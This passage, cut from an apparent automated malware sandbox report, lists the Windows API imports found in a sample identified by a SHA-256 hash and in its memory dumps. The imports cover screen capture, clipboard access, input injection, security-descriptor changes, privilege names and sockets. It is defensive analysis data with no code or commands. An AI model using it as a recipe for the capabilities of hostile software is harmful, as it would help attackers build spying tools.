\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapSize\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"InterlockedExchange\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetComputerNameA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetACP\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapCreate\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrcpyA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"VirtualQuery\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"Sleep\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetTokenInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ChangeServiceConfigA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"AddAccessAllowedAce\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"InitializeAcl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetLengthSid\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetSecurityDescriptorSacl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"DeleteDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SelectObject\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetDIBits\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"BitBlt\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"DeleteObject\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnumResourceLanguagesA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"MoveFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FindClose\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"BeginUpdateResourceA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UpdateResourceA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetVolumeInformationA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetThreadPriority\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetPriorityClass\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EndUpdateResourceA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetDateFormatA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrcmpA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LockResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCurrentThread\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FreeResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UuidToStringA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"RpcStringFreeA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UuidCreate\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SHGetMalloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetFocus\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EmptyClipboard\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetMessageA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SendInput\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"PostQuitMessage\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowRect\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UpdateWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LookupIconIdFromDirectoryEx\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCursorPos\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ReleaseDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetWindowTextA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UnregisterClassA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetClipboardData\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowPlacement\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetClientRect\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetCursorPos\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"RegisterClassA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"DestroyWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetFileVersionInfoSizeA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetFileVersionInfoA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"VerQueryValueA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"__WSAFDIsSet\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"htons\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"inet_ntoa\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"getpeername\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"closesocket\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"gethostbyaddr\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"WSAGetLastError\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SeShutdownPrivilege\"; Source: \"00000000-00000336.00000000.74072.002C0000.00000004.mdmp, 00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProductInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ServicesActive\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"NtShutdownSystem\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found 